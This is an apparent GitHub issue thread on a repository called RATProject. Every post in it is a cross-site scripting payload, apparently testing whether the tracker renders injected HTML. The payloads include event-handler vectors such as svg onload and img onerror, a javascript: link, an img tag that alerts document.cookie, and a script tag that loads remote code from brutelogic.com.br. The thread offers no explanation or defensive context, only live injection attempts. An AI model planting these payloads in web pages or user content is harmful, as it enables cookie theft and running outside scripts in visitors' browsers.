### ISSUE TITLE
test

### ISSUE THREAD

**Issue by hACKeROne-bug** [huynh044/RATProject#3]
<a href=javascript:alert(1)>click

**Comment by huynh044** [comment]
<body onhashchange="alert(1)">

**Comment by huynh044** [comment]
<svg onload=alert(1)>

**Comment by huynh044** [comment]
<img src=1 onerror=alert(1)>

**Comment by huynh044** [comment]
<image draggable="true" ondragstart="alert(1)">test</image>

**Comment by hACKeROne-bug** [comment]
<img src='https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ftse3.mm.bing.net%2Fth%3Fid%3DOIP._qcI5X8SWvqoUAnLwnA6CwHaEo%26pid%3DApi&f=1&ipt=aebf77191cf35635e87c8c1490ae2c117099b2df95428b3ec57e197a601bebfb&ipo=images' onload=alert(document.cookie)>

**Comment by huynh044** [comment]
<a href='https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ftse3.mm.bing.net%2Fth%3Fid%3DOIP._qcI5X8SWvqoUAnLwnA6CwHaEo%26pid%3DApi&f=1&ipt=aebf77191cf35635e87c8c1490ae2c117099b2df95428b3ec57e197a601bebfb&ipo=images' onclick=alert()>huynh</a>

**Comment by huynh044** [comment]
<script src=//brutelogic.com.br/1.js>
